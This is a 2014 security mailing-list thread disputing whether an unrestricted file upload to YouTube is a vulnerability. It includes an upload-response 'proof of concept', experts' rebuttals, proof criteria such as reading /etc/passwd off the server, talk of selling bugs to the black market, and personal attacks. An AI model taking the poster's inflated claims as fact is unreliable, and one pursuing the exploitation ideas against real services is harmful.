Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Please stop changing hats, it's embarrasing. On Sat, Mar 15, 2014 at 7:36 PM, T Imbrahim timbra...@techemail.com wrote: Is this treated with the same way that says that Remote File Inclusion is not a security issue ? You don't follow? Implying ? I understand why nobody likes Google. If I 've found a vulnerability and been treated like that for trying to help, I would rather sell it to the black market or to some government. The NSA maybe is happy to buy a RFI on Google, im sure they could make good use of that. Google is very deceptive in security matters. --- lcam...@coredump.cx wrote: From: Michal Zalewski lcam...@coredump.cx To: timbra...@techemail.com Cc: pr...@yahoo.co.uk, full-disclosure full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC Date: Sat, 15 Mar 2014 10:59:40 -0700 A hacker exploits a JSON (javascript) object that has information of interest for example holding some values for cookies. A lot of times that exploits the same policy origin. The JSON object returned from a server can be forged over writing javascript function that create the object. This happens because of the same origin policy problem in browsers that cannot say if js execution it different for two different sites. To be honest, I'm not sure I follow, but I'm fairly confident that my original point stands. If you believe that well-formed JSON objects without padding can be read across origins within the browser, I would love to see more information about that. (In this particular case, it still wouldn't matter because the response doesn't contain secrets, but it would certainly break a good chunk of the Internet.) JSONP is a different animal. /mz _ Are you a Techie? Get Your Free Tech Email Address Now! Visit http://www.TechEmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
ROFL [image: Inline image 1] On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim timbra...@techemail.comwrote: What drugs are you on Pedro Ribeiro I wonder ...? I express my views, if you don't like don't watch them. You responses so far have only been assy speculations so don't tell me Im wrong , and please don't say thing like that. I don't know who the other people is, but what is true in security I support. Why you would Google my name ... ? Is the English language causing you ill effects? --- ped...@gmail.com wrote: From: Pedro Ribeiro ped...@gmail.com To: timbra...@techemail.com Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski lcam...@coredump.cx, mvi...@gmail.com, gynv...@coldwind.pl Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC Date: Mon, 17 Mar 2014 09:24:08 + On 16 Mar 2014 23:36, T Imbrahim timbra...@techemail.com wrote: The thread read Google vulnerabilities with PoC. From my understanding it was a RFI vulnerability on YouTube, and I voiced my support that this is a vulnerability. I also explained a JSON Hijacking case as a follow up, and you said you didn't follow. So I am just saying that treating security that way, there are other parties like NSA who welcome them happily. I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock puppets. They are all first time posters from unusual free email providers jumping to defend the OP out of nowhere. If you search Google for their emails you only find references to this thread. They present similar (false and /or incorrect) arguments, talk about their extensive work experience, bash Google and its security team and send repeated emails with exactly the same text. This is turning into a madhouse... I hope this guy doesn't have access to a gun. Regards Pedro -- Are you a Techie? Get Your Free Tech Email Address Now! Visit http://www.TechEmail.com -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” inline: 10iceb6.jpg___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
On Mon, Mar 17, 2014 at 2:25 PM, T Imbrahim timbra...@techemail.com wrote: I definitely would patch my computer if I discovered that somebody could upload files to my computer, even thought if couldn't 'probe' them. 1) I don't think you understood the meaning of the word probe in this context, Nikolas, 2) Does that mean you believe Dropbox is vulnerable to remote file upload too? -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
On Mon, Mar 17, 2014 at 3:11 PM, Ulisses Montenegro ulisses.montene...@gmail.com wrote: Should YouTube restrict file uploads to known valid mime types? Sure, but that's only how you got the data in there to begin with. It's what happens after the data is in that will make all the difference. At this point I'm not even sure the data isn't being restricted - it just may be that the data type is checked again after it gets pulled out of the queue for processing, and if it's not a video it gets discarded. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
On Sat, Mar 15, 2014 at 5:43 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: People who do not have the facts have been, trying to attack the arguer, on the basis of their personal beliefs. Wow. I seriously can't tell if you're trolling or unbelievably narcissistic. Your work has serious flaws, and have been pointed out with facts over and over - but you think they're ad-hominem attacks based on the tone of their replies. Zalewski here is just trying to be nice and patient with you - but you somehow seem to believe he agrees with you based on the tone of his replies. You're either faking it and pulling a massive prank on all of us, or you're so self absorbed you can't get past your own emotional responses to people pointing out your mistakes. The actual contents of what they tell you are irrelevant to you, all that matters is if people praise or criticize you. I'm beginning to think you may have issues and we should all back off for a while. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
That is not what this email says. You can't reply correct to criticism and pretend it's praise. On Sat, Mar 15, 2014 at 6:11 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Correct. The mime type can be circumvented. We can confirm this to be a valid vulnerability. For the PoC's : http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml On Fri, Mar 14, 2014 at 8:40 PM, Krzysztof Kotowicz kkotowicz...@gmail.com wrote: 2014-03-14 20:28 GMT+01:00 Nicholas Lemonias. lem.niko...@googlemail.com : Then that also means that firewalls and IPS systems are worthless. Why spend so much time protecting the network layers if a user can send any file of choice to a remote network through http... No, they are not worthless per se, but of course for an user content publishing service they need to allow file upload over HTTP/s. How far those files are inspected and later processed is another question - and that could lead to a vulnerability that you DIDN'T demonstrate. You just uploaded a .sh file. There's no harm in that as nowhere did you prove that that file is being executed. Similarly (and that has been pointed out in this thread) you could upload a PHP-GIF polyglot file to a J2EE application - no vulnerability in this. Prove something by overwriting a crucial file, tricking other user's browser to execute the file as HTML from an interesting domain (XSS), popping a shell, triggering XXE when the file is processed as XML, anything. Then that is a vulnerability. So far - sorry, it is not, and you've been told it repeatedly. As for the uploaded files being persistent, there is evidence of that. For instance a remote admin could be tricked to execute some of the uploaded files (Social Engineering). Come on, seriously? Social Engineering can make him download this file from pastebin just as well. That's a real stretch. IMHO it is not a security issue. You're uploading a file to some kind of processing queue that does not validate a file type, but nevertheless only processes those files as video - there is NO reason to suspect otherwise, and I'd like to be proven wrong here. Proven as in PoC. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
I believe Zalewski has explained very well why it isn't a vulnerability, and you couldn't possibly be calling him hostile. :) On Sat, Mar 15, 2014 at 11:20 AM, M Kirschbaum pr...@yahoo.co.uk wrote: I have been watching this thread for a while and I think some people are being hostile here. There is nothing to gain being on eithers side but for the sake of security. As a penetration tester, writer, and malware analyst with a long and rewarding career...it would be absurd to admit that this is not a vulnerability. If the content-type fields can be altered and the API accepts it that is undoubtedly a vulnerability, I believe that it shouldn't be there. It would be a shame to say that this is not a security problem. I have seen different responses on this thread but having seen the proof of concept images as well I just think that some of the people commenting here are just being hostile. It doesn't take much for somebody in the field, to see clearly that Google does not want to pay. And I bet any amount of money that the bug bounty program is a way for filing potential threats by name and bank details. Rgds, M. Kirschbaum ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
Thank you. :) On Sat, Mar 15, 2014 at 1:45 PM, Gynvael Coldwind gynv...@coldwind.plwrote: Hey, I think the discussion digressed a little from the topic. Let's try to steer it back on it. What would make this a security vulnerability is one of the three standard outcomes: - information leak - i.e. leaking sensitive information that you normally do not have access to - remote code execution - in this case it would be: -- XSS - i.e. executing attacker provided JS/etc code in another user's browser, in the context *of a sensitive, non-sandboxed* domain (e.g. youtube.com) -- server-side code execution - i.e. executing attacker provided code on the youtube servers - denial of service - I think we all agree this bug doesn't increase the chance of a DoS; since you upload files that fail to be processed (so the CPU-consuming re-encoding is never run) I would argue that this decreases the chance of DoS if anything Which leaves us with the aforementioned RCE. I think we all agree that if Mr. Lemonias presents a PoC that uses the functionality he discovered to, either: (A) display a standard XSS alert(document.domain) in a sensitive domain (i.e. *.youtube.com or *.google.com, etc) for a different (test) user OR (B) execute code to fetch the standard /etc/passwd file from the youtube server and send it to him, then we will be convinced that this is vulnerability and will be satisfied by the presented proof. I think that further discussion without this proof is not leading anywhere. One more note - in the discussion I noticed some arguments were tried to be justified or backed by saying I am this this and that, and have this many years of experience, e.g. (the first one I could find): have worked for Lumension as a security consultant for more than a decade. Please note, that neither experience, nor job title, proves exploitability of a *potential* bug. Working exploits do. That's it from me. I'm looking forward to seeing the RCE exploits (be it client or server side). Kind regards, Gynvael Coldwind -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
Sockpuppet much? On Sat, Mar 15, 2014 at 2:35 PM, M Kirschbaum pr...@yahoo.co.uk wrote: Gynvael Coldwind, What Alfred has reiterated is that this is a security vulnerability irrelevantly of whether it qualifies for credit. It is an unusual one, but still a security vulnerability. Anyone who says otherwise is blind, has little or no experience in hands on security, or either has a different agenda. The obvious here is that Google dismissed it as a non-security issue which I find rather sad and somewhat ridiculous. Even if we asked Andrew Tanenbaum about ,I suspect his answers wouldn't be much different. Rgds, On Saturday, 15 March 2014, 12:45, Gynvael Coldwind gynv...@coldwind.pl wrote: Hey, I think the discussion digressed a little from the topic. Let's try to steer it back on it. What would make this a security vulnerability is one of the three standard outcomes: - information leak - i.e. leaking sensitive information that you normally do not have access to - remote code execution - in this case it would be: -- XSS - i.e. executing attacker provided JS/etc code in another user's browser, in the context *of a sensitive, non-sandboxed* domain (e.g. youtube.com) -- server-side code execution - i.e. executing attacker provided code on the youtube servers - denial of service - I think we all agree this bug doesn't increase the chance of a DoS; since you upload files that fail to be processed (so the CPU-consuming re-encoding is never run) I would argue that this decreases the chance of DoS if anything Which leaves us with the aforementioned RCE. I think we all agree that if Mr. Lemonias presents a PoC that uses the functionality he discovered to, either: (A) display a standard XSS alert(document.domain) in a sensitive domain (i.e. *.youtube.com or *.google.com, etc) for a different (test) user OR (B) execute code to fetch the standard /etc/passwd file from the youtube server and send it to him, then we will be convinced that this is vulnerability and will be satisfied by the presented proof. I think that further discussion without this proof is not leading anywhere. One more note - in the discussion I noticed some arguments were tried to be justified or backed by saying I am this this and that, and have this many years of experience, e.g. (the first one I could find): have worked for Lumension as a security consultant for more than a decade. Please note, that neither experience, nor job title, proves exploitability of a *potential* bug. Working exploits do. That's it from me. I'm looking forward to seeing the RCE exploits (be it client or server side). Kind regards, Gynvael Coldwind -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [SPAM] [Bayesian][bayesTestMode] Re: Google vulnerabilities with PoC
You must be new. On Sat, Mar 15, 2014 at 3:43 PM, Thomas Williams tho...@trwilliams.me.ukwrote: I signed onto this mailing list as an interested person in security - not to see everyone moan. We will all have differences in opinion and we should all respect that. This goes for everyone and I feel I speak for a lot of people here, everyone needs to grow up, and shut up. Email scanned and verified safe. On 15 Mar 2014, at 13:43, Mario Vilas mvi...@gmail.com wrote: Sockpuppet much? On Sat, Mar 15, 2014 at 2:35 PM, M Kirschbaum pr...@yahoo.co.uk wrote: Gynvael Coldwind, What Alfred has reiterated is that this is a security vulnerability irrelevantly of whether it qualifies for credit. It is an unusual one, but still a security vulnerability. Anyone who says otherwise is blind, has little or no experience in hands on security, or either has a different agenda. The obvious here is that Google dismissed it as a non-security issue which I find rather sad and somewhat ridiculous. Even if we asked Andrew Tanenbaum about ,I suspect his answers wouldn't be much different. Rgds, On Saturday, 15 March 2014, 12:45, Gynvael Coldwind gynv...@coldwind.pl wrote: Hey, I think the discussion digressed a little from the topic. Let's try to steer it back on it. What would make this a security vulnerability is one of the three standard outcomes: - information leak - i.e. leaking sensitive information that you normally do not have access to - remote code execution - in this case it would be: -- XSS - i.e. executing attacker provided JS/etc code in another user's browser, in the context *of a sensitive, non-sandboxed* domain (e.g. youtube.com) -- server-side code execution - i.e. executing attacker provided code on the youtube servers - denial of service - I think we all agree this bug doesn't increase the chance of a DoS; since you upload files that fail to be processed (so the CPU-consuming re-encoding is never run) I would argue that this decreases the chance of DoS if anything Which leaves us with the aforementioned RCE. I think we all agree that if Mr. Lemonias presents a PoC that uses the functionality he discovered to, either: (A) display a standard XSS alert(document.domain) in a sensitive domain (i.e. *.youtube.com or *.google.com, etc) for a different (test) user OR (B) execute code to fetch the standard /etc/passwd file from the youtube server and send it to him, then we will be convinced that this is vulnerability and will be satisfied by the presented proof. I think that further discussion without this proof is not leading anywhere. One more note - in the discussion I noticed some arguments were tried to be justified or backed by saying I am this this and that, and have this many years of experience, e.g. (the first one I could find): have worked for Lumension as a security consultant for more than a decade. Please note, that neither experience, nor job title, proves exploitability of a *potential* bug. Working exploits do. That's it from me. I'm looking forward to seeing the RCE exploits (be it client or server side). Kind regards, Gynvael Coldwind -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
On Thu, Mar 13, 2014 at 10:30 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We confirm this to be a valid vulnerability for the following reasons. The access control subsystem is defeated, resulting to arbitrary write access of any file of choice. 1. You Tube defines which file types are permitted to be uploaded. And...? 2. Exploitation is achieved by circumvention of web-based security controls (namely http forms, which is a weak security measure). However, exploitation of the issue results to unrestricted file uploads (any file of choice ). Remote code execution may be possible either through social engineering , or by stochastically rewriting an existing file-structure in the CDN. So in ohter words, you haven't proven it. The upload in itself is not a vulnerability (and if you understood that it is, please read again that OWASP document). 3. This directly impacts the integrity of the service since modification of information occurs by circumvention. Renaming the uploaded files can be achieved through YouTube's inherent video manager. How does it impact the integrity? Again, unexpected functionality does not necessarily equal exploitation. 4. Denial of Service attacks are feasible since we bypass all security restrictions. This directly impacts the availability of the service. Not proven either. At this point I feel you're just making stuff up. All you did was upload stuff you can't download afterwards. 5. Malware propagation is possible, if the planted code get's executed through social engineering or by re-writing a valid file system structure. Again, you need to be able to download the stuff you uploaded, and have it executed directly. Otherwise you could do the same thing more efficiently with Google Drive. 6) All uploaded files can be downloaded through Google Take Out, if past the Content ID filtering algorithm (through file header obfuscation and encryption). You need to explain how that is an attack vector. Best Regards, Nicholas Lemonias Advanced Information Security Corp. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
You're still missing the attack vector (and the point of the discussion too, but that's painfully obvious). On Fri, Mar 14, 2014 at 4:21 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Here's my evidence. Live Proof Of Concept == http://upload.youtube.com/?authuser=0upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aworigin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw {sessionStatus:{state:FINALIZED,externalFieldTransfers:[{name:file,status:COMPLETED,bytesTransferred:113,bytesTotal:113,formPostInfo:{url: http://www.youtube.com/upload/rupio?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026file_id=000 ,cross_domain_url: http://upload.youtube.com/?authuser=0\u0026upload_id=AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw\u0026origin=CiNodHRwOi8vd3d3LnlvdXR1YmUuY29tL3VwbG9hZC9ydXBpbxINdmlkZW8tdXBsb2Fkcw},content_type:text/x-sh}],additionalInfo:{uploader_service.GoogleRupioAdditionalInfo:{completionInfo:{status:SUCCESS,customerSpecificInfo:{status: ok, video_id: KzKDtijwHFI,upload_id:AEnB2UqVZlaog3GremriQEGDoUK3cdGGPu9MVIfyObgYajjo6i1--uQicn6jhbwsdNrqSF4ApbUbhCcwzdwe4xf_XTbL_t5-aw}} The above proof of concept demonstrates : 1. We have bypassed the security controls in Youtube and uploaded an unexpected file type. 2. The file is persistent and has not been deleted by YouTube. 3. It can be queried for information since it is assigned a unique upload_id. 4. It's successfully uploaded to youtube.com As you can see it give out the total bytes written to the remote network. 5. content_type:text/x-sh}] --- The file is a shell script script named 'file' 6. It can be enumerated by a non-authenticated user, remotely. On Fri, Mar 14, 2014 at 2:40 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Are you a Google employee...I wonder? There is nothing else to be said regarding this. Our research for remote code execution continues and will let you and Google know once that is confirmed; through the coordinated security program. And please OWASP, is recognised worldwide. Best Regards, Nicholas Lemonias On Thu, Mar 13, 2014 at 11:06 PM, Julius Kivimäki julius.kivim...@gmail.com wrote: Look, you keep calling it a vulnerability with 0 evidence that it's even exploitable. Until you can prove otherwise this is like speculating the potential security repercussions of uploading files to EC2 (Which would probably have potential to be much more severe than what you're discussing here since javascript uploaded to ec2 could actually get executed by someones browser) You keep throwing around keywords like OWASP, OSI, security best practices as if they actually make a difference here. Truth is there's no reason to believe that what you have discovered here is exploitable. This mostly seems like a desperate attempt of getting money off of google and your name in some publication shitty enough to not do any fact checking (eg. softpedia) . 2014-03-13 21:48 GMT+02:00 Nicholas Lemonias. lem.niko...@googlemail.com: Julius Kivimaki, your disbelief in OWASP, CEH, Journalists and anything you may, or may not be qualified to question amazes. But everyone's opinion is of course respected. I normally don't provide security lessons via e-mail and full-disclosure, however you seem not to understand the security report fully and some core principles. If you can't see what information security best practises, the OSI/network model and self-automata propagation has anything to do with arbitrary write permissions to a remote network leveraging from the application layer, then me and you have nothing to talk about. As for the exploitability of this vulnerability, you will never know until you try. And we have tried it , and seem to know better. I suggest you read the report again. Thank you. -- Forwarded message -- From: Nicholas Lemonias. lem.niko...@googlemail.com Date: Thu, Mar 13, 2014 at 7:47 PM Subject: Re: [Full-disclosure] Google vulnerabilities with PoC To: Julius Kivimäki julius.kivim...@gmail.com Julius Kivimaki, your disbelief in OWASP, CEH, Journalists and anything you may, or may not be qualified to question amazes. But everyone's opinion is of course respected. I normally don't provide security lessons via e-mail and full-disclosure, however you seem not to understand the security report fully and some core principles. If you can't see what information security best practises, the OSI/network model and self-automata propagation has anything to do with arbitrary write permissions to a remote network leveraging from the application layer, then me and you have nothing to talk about. As for the exploitability of this vulnerability, you will never know until you
Re: [Full-disclosure] Google vulnerabilities with PoC
But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.comwrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report This would help to evaluate/measure the risk (e.g. CVSS). Helping the decision/actions around this risk PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in term of Risk Acceptance (which could be another Finding) So in few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616) My 2 bitcents Sorry if it is not edible :) Happy Hacking! /JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do the things we *really* don't want it to do. In this spirit, the term vulnerability is generally reserved for behaviors that meet all of the following criteria: 1) The behavior must have negative consequences for at least one of the legitimate stakeholders (users, service owners, etc), 2) The consequences must be widely seen as unexpected and unacceptable, 3) There must be a realistic chance of such a negative outcome, 4) The behavior must introduce substantial new risks that go beyond the previously accepted trade-offs. If we don't have that, we usually don't have a case, no matter how clever the bug is. Cheers (and happy hunting!), /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the
Re: [Full-disclosure] Google vulnerabilities with PoC
On Fri, Mar 14, 2014 at 12:38 PM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Jerome of Mcafee has made a very valid point on revisiting separation of duties in this security instance. Happy to see more professionals with some skills. Some others have also mentioned the feasibility for Denial of Service attacks. Remote code execution by Social Engineering is also a prominent scenario. Actually, people have been pointing out exactly the opposite. But if you insist on believing you can DoS an EC2 by uploading files, good luck to you then... If you can't tell that that is a vulnerability (probably coming from a bunch of CEH's), I feel sorry for those consultants. You're the only one throwing around certifications here. I can no longer tell if you're being serious or this is a massive prank. Nicholas. On Fri, Mar 14, 2014 at 10:45 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. However successful exploitation permits arbitrary write() of any file of choice. I could release an exploit code in C Sharp or Python that permits multiple file uploads of any file/types, if the Google security team feels that this would be necessary. This is unpaid work, so we are not so keen on that job. On Fri, Mar 14, 2014 at 6:04 AM, Jerome Athias athiasjer...@gmail.com wrote: Hi I concur that we are mainly discussing a terminology problem. In the context of a Penetration Test or WAPT, this is a Finding. Reporting this finding makes sense in this context. As a professional, you would have to explain if/how this finding is a Weakness*, a Violation (/Regulations, Compliance, Policies or Requirements[1]) * I would say Weakness + Exposure = Vulnerability. Vulnerability + Exploitability (PoC) = Confirmed Vulnerability that needs Business Impact and Risk Analysis So I would probably have reported this Finding as a Weakness (and not Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not Best Practice (your OWASP link and Cheat Sheets), and even if mitigative/compensative security controls (Ref Orange Book), security controls like white listing (or at least black listing. see also ESAPI) should be 1) part of the [1]security requirements of a proper SDLC (Build security in) as per Defense-in-Depth security principles and 2) used and implemented correctly. NB: A simple Threat Model (i.e. list of CAPEC) would be a solid support to your report This would help to evaluate/measure the risk (e.g. CVSS). Helping the decision/actions around this risk PS: interestingly, in this case, I'm not sure that the Separation of Duties security principle was applied correctly by Google in term of Risk Acceptance (which could be another Finding) So in few words, be careful with the terminology. (don't always say vulnerability like the media say hacker, see RFC1392) Use a CWE ID (e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616) My 2 bitcents Sorry if it is not edible :) Happy Hacking! /JA https://github.com/athiasjerome/XORCISM 2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx: Nicholas, I remember my early years in the infosec community - and sadly, so do some of the more seasoned readers of this list :-) Back then, I thought that the only thing that mattered is the ability to find bugs. But after some 18 years in the industry, I now know that there's an even more important and elusive skill. That skill boils down to having a robust mental model of what constitutes a security flaw - and being able to explain your thinking to others in a precise and internally consistent manner that convinces others to act. We need this because the security of a system can't be usefully described using abstract terms: even the academic definitions ultimately boil down to saying the system is secure if it doesn't do
Re: [Full-disclosure] Google vulnerabilities with PoC
LOL, thanks for the undeserved praise! xD On Fri, Mar 14, 2014 at 2:50 PM, Sergio 'shadown' Alvarez shad...@gmail.com wrote: Dear Nicholas Lemonias, I don't use to get in these scrapy discussions, but yeah you are in a completetly different level if you compare yourself with Mario. You are definitely a Web app/metasploit-user guy and pick up a discussion with a binary and memory corruption ninja exploit writter like Mario. You should know your place and shut up. Period. Btw, if you dare discussing with a beast like lcamtuf, you are definitely out of your mind. Cheers, Sergio. -- Sergio On Mar 14, 2014, Nicholas Lemonias. lem.niko...@googlemail.com wrote: We are on a different level perhaps. We do certainly disagree on those points. I wouldn't hire you as a consultant, if you can't tell if that is a valid vulnerability.. Best Regards, Nicholas Lemonias. On Fri, Mar 14, 2014 at 10:10 AM, Mario Vilas mvi...@gmail.com wrote: But do you have all the required EH certifications? Try this one from the Institute for Certified Application Security Specialists: http://www.asscert.com/ On Fri, Mar 14, 2014 at 7:41 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Thanks Michal, We are just trying to improve Google's security and contribute to the research community after all. If you are still on EFNet give me a shout some time. We have done so and consulted to hundreds of clients including Microsoft, Nokia, Adobe and some of the world's biggest corporations. We are also strict supporters of the ACM code of conduct. Regards, Nicholas Lemonias. AISec On Fri, Mar 14, 2014 at 6:29 AM, Nicholas Lemonias. lem.niko...@googlemail.com wrote: Hi Jerome, Thank you for agreeing on access control, and separation of duties. 